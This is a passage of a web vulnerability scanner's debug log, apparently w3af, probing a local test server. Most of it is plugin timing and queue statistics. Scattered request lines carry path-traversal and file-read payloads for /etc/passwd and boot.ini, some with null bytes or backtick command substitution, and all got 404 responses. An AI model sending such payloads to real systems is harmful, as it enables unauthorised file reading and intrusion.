2020 - debug] credit_cards.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] websockets_links.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] csp.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] dom_xss.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] keys.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2346. [Wed Feb 12 10:04:33 2020 - debug] clamav.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2347. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4526. [Wed Feb 12 10:04:33 2020 - debug] vulners_db.grep(uri="http://localhost:9090/29/") took 0.10s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2348. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2349. [Wed Feb 12 10:04:33 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] objects.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] error_500.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_tags.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] password_profiling.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] click_jacking.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] lang.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] url_session.grep(uri="http://localhost:9090/29/") took 0.03s to run [Wed Feb 12 10:04:33 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2350. [Wed Feb 12 10:04:33 2020 - debug] strange_reason.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cache_control.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_headers.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] ssn.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] oracle.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] feeds.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] error_pages.grep(uri="http://localhost:9090/29/") took 0.01s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/www-sql/ returned HTTP code "404" (id=24179,from_cache=0,grep=1,rtt=0.05,did=1eBKxUaT) [Wed Feb 12 10:04:33 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/29/") took 0.02s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2351. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/temp/ returned HTTP code "404" (id=24183,from_cache=0,grep=1,rtt=0.12,did=Iq74Iv8a) [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/root/ returned HTTP code "404" (id=24180,from_cache=0,grep=1,rtt=0.15,did=A4AdHREu) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/jailshell returned HTTP code "404" (id=24182,from_cache=0,grep=1,rtt=0.09,did=doCARKI4) [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/forum-ra.asp?n=/etc/passwd returned HTTP code "404" (id=24181,from_cache=0,grep=1,rtt=0.17,did=6WZXQHeK) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/board/philboard_admin.asp returned HTTP code "404" (id=24184,from_cache=0,grep=1,rtt=0.06,did=SnzCr7Kx) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/admin/settings.inc.php returned HTTP code "404" (id=24185,from_cache=0,grep=1,rtt=0.04,did=yEYOvjvw) [Wed Feb 12 10:04:33 2020 - debug] symfony.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2352. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2353. [Wed Feb 12 10:04:33 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] expect_ct.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] svn_users.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] private_ip.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] file_upload.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2354. [Wed Feb 12 10:04:33 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:33 2020 - debug] motw.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_generator.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] retirejs.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:33 2020 - debug] serialized_object.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] blank_body.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] credit_cards.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] websockets_links.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] csp.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] dom_xss.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] vulners_db.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] keys.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] clamav.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/samples/search/queryhit.htm returned HTTP code "404" (id=24188,from_cache=0,grep=1,rtt=0.15,did=DJJ72cN0) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/dotproject/modules/projects/addedit.php returned HTTP code "404" (id=24190,from_cache=0,grep=1,rtt=0.07,did=Sy6JmXYG) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/AnyBoard.cgi returned HTTP code "404" (id=24192,from_cache=0,grep=1,rtt=0.08,did=YjWJQVfA) [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/forum-ra_professionnel.asp?n=/etc/passwd returned HTTP code "404" (id=24193,from_cache=0,grep=1,rtt=0.04,did=t953aQg5) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/nlog-smb.pl returned HTTP code "404" (id=24194,from_cache=0,grep=1,rtt=0.06,did=mHQwBkn9) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/pub/ returned HTTP code "404" (id=24196,from_cache=0,grep=1,rtt=0.14,did=S0KFhSBM) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/ows/ returned HTTP code "404" (id=24197,from_cache=0,grep=1,rtt=0.08,did=OXogwOor) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/webaccess/access-options.txt returned HTTP code "404" (id=24187,from_cache=0,grep=1,rtt=0.11,did=PQfQze4R) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/logs/access_log returned HTTP code "404" (id=24198,from_cache=0,grep=1,rtt=0.11,did=C7Le3l09) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/bnbform returned HTTP code "404" (id=24189,from_cache=0,grep=1,rtt=0.05,did=CFWkzquM) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/stats.txt returned HTTP code "404" (id=24186,from_cache=0,grep=1,rtt=0.07,did=MPfb8oxo) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2355. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/sun/ returned HTTP code "404" (id=24191,from_cache=0,grep=1,rtt=0.02,did=6YU6Ffns) [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/forum1.asp?n=1753&=&nn=/etc/passwd\x00 returned HTTP code "404" (id=24195,from_cache=0,grep=1,rtt=0.10,did=aFPfpY8k) [Wed Feb 12 10:04:33 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] localhost:9090 connection pool stats (free:251 / in_use:2 / max:50 / total:253) [Wed Feb 12 10:04:33 2020 - debug] Connections with more in use time: (1bb9c316a7b4ca18, 0.08 sec) (80be45d39101dda0, 0.07 sec) (ff937a1f47ad2ce2, 0.07 sec) (144bbb73d0f0f0f4, 0.02 sec) (c80f716819dd7c2d, 0.02 sec) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/auth.inc.php returned HTTP code "404" (id=24199,from_cache=0,grep=1,rtt=0.05,did=FVn6YNVn) [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/pls/admin returned HTTP code "404" (id=24201,from_cache=0,grep=1,rtt=0.03,did=hOxz6bfo) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/secret/ returned HTTP code "404" (id=24203,from_cache=0,grep=1,rtt=0.06,did=Vd836564) [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/forum1.asp?n=/etc/passwd&=&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. returned HTTP code "404" (id=24202,from_cache=0,grep=1,rtt=0.11,did=9MKrk0E5) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/tools/ returned HTTP code "404" (id=24206,from_cache=0,grep=1,rtt=0.11,did=4klAJlRn) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/ultraboard.pl returned HTTP code "404" (id=24207,from_cache=0,grep=1,rtt=0.17,did=2YXRp9Uq) [Wed Feb 12 10:04:33 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12587, 'reject-seen-url': 5822, 'reject-out-of-scope': 216, 'accept': 4950} [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/setup/ returned HTTP code "404" (id=24208,from_cache=0,grep=1,rtt=0.06,did=MLBNo7Q2) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/environ.pl returned HTTP code "404" (id=24200,from_cache=0,grep=1,rtt=0.07,did=oHXzGpbl) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/day5datacopier.cgi returned HTTP code "404" (id=24204,from_cache=0,grep=1,rtt=0.12,did=IEh8Ua0h) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/entete.php returned HTTP code "404" (id=24205,from_cache=0,grep=1,rtt=0.03,did=GpfZRssH) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/_mem_bin/FormsLogin.asp returned HTTP code "404" (id=24209,from_cache=0,grep=1,rtt=0.04,did=arECmSVG) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/README.TXT returned HTTP code "404" (id=24212,from_cache=0,grep=1,rtt=0.00,did=fb3O0hb7) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/config/html/cnf_gi.htm returned HTTP code "404" (id=24211,from_cache=0,grep=1,rtt=0.07,did=geLm3fss) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/survey.cgi returned HTTP code "404" (id=24213,from_cache=0,grep=1,rtt=0.12,did=XT1r1DdV) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/wwwthreads/w3tvars.pm returned HTTP code "404" (id=24210,from_cache=0,grep=1,rtt=0.07,did=WdGiCmEt) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2356. [Wed Feb 12 10:04:33 2020 - debug] url_session.grep(uri="http://localhost:9090/node/") took 0.07s to run [Wed Feb 12 10:04:33 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] objects.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] error_500.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_tags.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] password_profiling.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] click_jacking.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] lang.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4525. [Wed Feb 12 10:04:33 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/template/ returned HTTP code "404" (id=24215,from_cache=0,grep=1,rtt=0.18,did=0uLRapvP) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4525. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2357. [Wed Feb 12 10:04:33 2020 - debug] error_pages.grep(uri="http://localhost:9090/node/") took 0.01s to run [Wed Feb 12 10:04:33 2020 - debug] strange_reason.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cache_control.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_headers.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] ssn.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] oracle.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] feeds.grep(uri="http://localhost:9090/node/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] localhost:9090 connection pool stats (free:255 / in_use:3 / max:50 / total:258) [Wed Feb 12 10:04:33 2020 - debug] Connections with more in use time: (eebf52b67217e22c, 0.09 sec) (80be45d39101dda0, 0.04 sec) (1bb9c316a7b4ca18, 0.03 sec) [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/forum.asp?n=/.\\"./.\\"./.\\"./.\\"./.\\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24214,from_cache=0,grep=1,rtt=0.22,did=VTEr4IpX) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2358. [Wed Feb 12 10:04:33 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/node/") took 0.03s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2359. [Wed Feb 12 10:04:33 2020 - debug] symfony.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2360. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2361. [Wed Feb 12 10:04:33 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/ss.cfg returned HTTP code "404" (id=24216,from_cache=0,grep=1,rtt=0.17,did=ul6EOdAq) [Wed Feb 12 10:04:34 2020 - debug] file_upload.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/ustats/ returned HTTP code "404" (id=24217,from_cache=0,grep=1,rtt=0.19,did=5rCuI7wH) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/WebShop/templates/cc.txt returned HTTP code "404" (id=24218,from_cache=0,grep=1,rtt=0.21,did=F9JSQqR0) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/cgi-bin/show.pl returned HTTP code "404" (id=24219,from_cache=0,grep=1,rtt=0.06,did=yoKXLwop) [Wed Feb 12 10:04:34 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2362. [Wed Feb 12 10:04:34 2020 - debug] expect_ct.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] svn_users.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] private_ip.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] motw.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] meta_generator.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] retirejs.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:34 2020 - debug] serialized_object.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2363. [Wed Feb 12 10:04:34 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] credit_cards.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] websockets_links.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] csp.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] dom_xss.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] clamav.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] blank_body.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] keys.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] vulners_db.grep(uri="http://localhost:9090/72/") took 0.03s to run [Wed Feb 12 10:04:34 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] objects.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] error_500.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] meta_tags.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] password_profiling.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] click_jacking.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] lang.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] url_session.grep(uri="http://localhost:9090/72/") took 0.07s to run [Wed Feb 12 10:04:34 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/cgi-bin/noshell returned HTTP code "404" (id=24230,from_cache=0,grep=1,rtt=0.09,did=fjiGMo7M) [Wed Feb 12 10:04:34 2020 - debug] GET http://localhost:9090/boilerplate.asp?NFuse_Template=../../boot.ini&=&NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found returned HTTP code "404" (id=24229,from_cache=0,grep=1,rtt=0.05,did=I1btzUBf) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/dotproject/modules/projects/view.php returned HTTP code "404" (id=24232,from_cache=0,grep=1,rtt=0.16,did=OTqQZPo7) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/scripts/counter.exe returned HTTP code "404" (id=24233,from_cache=0,grep=1,rtt=0.08,did=IJ1JtS0D) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/cgi-bin/AnyForm returned HTTP code "404" (id=24235,from_cache=0,grep=1,rtt=0.11,did=DdFTOkTa) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/sales/ returned HTTP code "404" (id=24226,from_cache=0,grep=1,rtt=0.03,did=NphZOPjU) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/poll returned HTTP code "404" (id=24225,from_cache=0,grep=1,rtt=0.14,did=j4SDE84G) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/database/metacart.mdb returned HTTP code "404" (id=24221,from_cache=0,grep=1,rtt=0.03,did=Tdcu6qdT) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/www/ returned HTTP code "404" (id=24228,from_cache=0,grep=1,rtt=0.05,did=MTco5SwU) [Wed Feb 12 10:04:34 2020 - debug] GET http://localhost:9090/forum1_professionnel.asp?n=/.\\"./.\\"./.\\"./.\\"./.\\"./boot.ini&=&=&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. returned HTTP code "404" (id=24234,from_cache=0,grep=1,rtt=0.23,did=Xf751I79) [Wed Feb 12 10:04:34 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12608, 'reject-seen-url': 5826, 'reject-out-of-scope': 216, 'accept': 4950} [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/admin/templates/header.php returned HTTP code "404" (id=24220,from_cache=0,grep=1,rtt=0.12,did=lCpsl2bd) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/admin/cfg/configsql.inc.php returned HTTP code "404" (id=24223,from_cache=0,grep=1,rtt=0.04,did=ROxzA8xE) [Wed Feb 12 10:04:34 2020 - debug] GET http://localhost:9090/forum1.asp?n=`/etc/passwd`&=&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. returned HTTP code "404" (id=24231,from_cache=0,grep=1,rtt=0.18,did=fJyuse8f) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/databases/ returned HTTP code "404" (id=24222,from_cache=0,grep=1,rtt=0.15,did=cCiqRRBn) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/cgi-bin/webwho.pl returned HTTP code "404" (id=24224,from_cache=0,grep=1,rtt=0.11,did=l1Mls1oQ) [Wed Feb 12 10:04:34 2020 - debug] GET http://localhost:9090/forum-ra.asp?n=/etc/passwd\x00 returned HTTP code "404" (id=24227,from_cache=0,grep=1,rtt=0.11,did=hSDvuJOH) [Wed Feb 12 10:04:34 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2364. [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/webadmin/ returned HTTP code "404" (id=24236,from_cache=0,grep=1,rtt=0.10,did=iw1QgyJn) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/cgi-bin/bnbform.cgi returned HTTP code "404" (id=24237,from_cache=0,grep=1,rtt=0.04,did=cKv0oL5b) [Wed Feb 12 10:04:34 2020 - debug] GET http://localhost:9090/forum-ra_professionnel.asp?n=/etc/passwd\x00 returned HTTP code "404" (id=24238,from_cache=0,grep=1,rtt=0.07,did=qmna8trk) [Wed Feb 12 10:04:34 2020 - debug] error_pages.grep(uri="http://localhost:9090/72/") took 0.13s to run [Wed Feb 12 10:04:34 2020 - debug] strange_reason.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] cache_control.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] 